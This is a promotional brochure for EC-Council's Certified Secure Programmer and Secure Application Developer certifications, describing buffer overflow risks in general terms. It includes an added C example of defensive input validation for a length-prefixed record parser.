12.07.2015 Views

Certified Secure Programmer - EC-Council


Certified Secure Programmer

Stop the Buffer Overflows. Stop the Hackers. Start Writing Secure Code.

EC-Council Certified Secure Programmer

http://www.eccouncil.org


Problem Statement

About 95% of software bugs come from common, well-understood programming mistakes. Today's developers ... oftentimes don't have the academic discipline of secure software engineering and secure software development and training around what characteristics would create flaws in the program or lead to bugs.

One of the problems is that the educational establishment generally doesn't teach secure programming at the undergraduate, or even graduate level.


Buffer Overflows

Vulnerabilities in applications are attributed to poor programming, lack of input validation and lack of a structured software engineering process. Buffer overflows make up one of the largest collections of vulnerabilities in existence, and a large percentage of possible remote exploits are of the overflow variety. If exploited properly, an overflow vulnerability will allow an attacker to run arbitrary code on the victim's machine with the equivalent rights of whichever process was overflowed. This is often used to provide a remote shell onto the victim machine, which can be used for further exploitation.

Buffer overflows in applications can be avoided by writing secure software code.
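
The input-validation point in the Buffer Overflows section above, as an added example that is not part of the EC-Council brochure: a C parser that checks a sender's claimed length against both the bytes actually received and the destination capacity before copying anything. The record layout, `parse_record`, `struct record` and `NAME_CAP` are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NAME_CAP 16 /* hypothetical capacity of the fixed-size field */

enum parse_status {
    PARSE_OK = 0,
    PARSE_TRUNCATED = -1, /* claimed length exceeds bytes received */
    PARSE_TOO_LONG = -2,  /* claimed length exceeds destination */
    PARSE_BAD_ARG = -3
};

struct record {
    char name[NAME_CAP + 1]; /* +1 for the terminating NUL */
};

/* Parse [1-byte length][name bytes] from untrusted input.
 * The unsafe form is a bare memcpy(out->name, in + 1, in[0]), which trusts
 * the sender's length byte. Here nothing is copied until that length has
 * been checked against the input size and the destination capacity. */
int parse_record(const uint8_t *in, size_t in_len, struct record *out)
{
    if (in == NULL || out == NULL)
        return PARSE_BAD_ARG;
    if (in_len < 1)
        return PARSE_TRUNCATED;

    size_t claimed = in[0];
    if (claimed > in_len - 1)
        return PARSE_TRUNCATED;
    if (claimed > NAME_CAP)
        return PARSE_TOO_LONG;

    memcpy(out->name, in + 1, claimed);
    out->name[claimed] = '\0';
    return PARSE_OK;
}

int main(void)
{
    /* Constructed sample input: length byte 5 followed by "alice". */
    const uint8_t sample[] = {5, 'a', 'l', 'i', 'c', 'e'};
    struct record r;
    int rc = parse_record(sample, sizeof sample, &r);
    printf("status=%d name=%s\n", rc, rc == PARSE_OK ? r.name : "(rejected)");
    return 0;
}
```

Oversized or inconsistent input is rejected with a distinct status instead of being silently truncated, so the caller can log and drop the record.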


Certified Secure Programmer

EC-Council's Certified Secure Programmer and Certified Secure Application Developer are being offered to provide the essential and fundamental skills to programmers and application developers in secure programming. The most prevalent reason behind buggy code and vulnerabilities being exploited by hackers and malicious code is the lack of adoption of secure coding practices.

The Certified Secure Programmer and Certified Secure Application Developer programs will ensure that programmers and developers are exposed to the inherent security drawbacks in various programming languages or architectures. They will be further trained to exercise secure programming practices to overcome these inherent drawbacks in order to pre-empt bugs from the code.


ECSP / CSAD

Certified Secure Programmer lays the basic foundation required by all application developers and development organizations to produce applications with greater stability and posing lesser security risks to the consumer. The Certified Secure Application Developer standardizes the knowledge base for application development by incorporating the best practices followed by experienced experts in the various domains.

The distinguishing aspect of ECSP and CSAD is that, unlike vendor or domain specific certifications, they expose the aspirant to various programming languages from a security perspective. This drives greater appreciation for the platform / architecture / language one specializes in, as well as an overview of related ones.

EC-Council Certified Secure Programmer (ECSP) and Certified Secure Application Developer (CSAD)


Requirements

1. To achieve EC-Council Certified Secure Programmer (E|CSP), pass EC-Council's Certified Secure Programmer 312-92 exam.
2. To achieve EC-Council Certified Secure Application Developer (C|SAD), achieve an application development certification from any of the following vendors and pass EC-Council's Certified Secure Programmer 312-92 exam.

For Linux: LCE / LCA / RHCE / LPI certification
For Microsoft: MCAD / MCSD certification
For Sun: SCJD / SCEA certification
For Oracle: OCP certification (DBA)
For IBM: WebSphere certification


Benefits

1. Exposure to a wide range of programming languages and train on well endorsed secure coding practices
2. Improve your employability in development organizations
3. Exposure to application development across platforms
4. Enhance skills on writing better code and improve efficiency
5. Build secure applications

Target Audience

The ECSP certification is intended for programmers who are responsible for designing and building secure Windows/Web based applications with .NET/Java Framework. It is designed for developers who have C#, C++ and Java development skills.


Certified Secure Application Developer Certification

Start

Step 1: Achieve ECSP Certification

Step 2: Achieve any one of the following vendor specific certifications:

For Linux: LCE / LCA / RHCE / LPI certification
For Microsoft: MCAD / MCSD certification
For Sun: SCJD / SCEA certification
For Oracle: OCP certification (DBA)
For IBM: WebSphere certification

CSAD Achieved


International Council of E-Commerce Consultants
67 Wall Street, 22nd Floor
New York, NY 10005-3198
USA
Phone: 212.380.1571
Fax: 212.202.3500

Copyright 2005 EC-Council. All Rights Reserved.
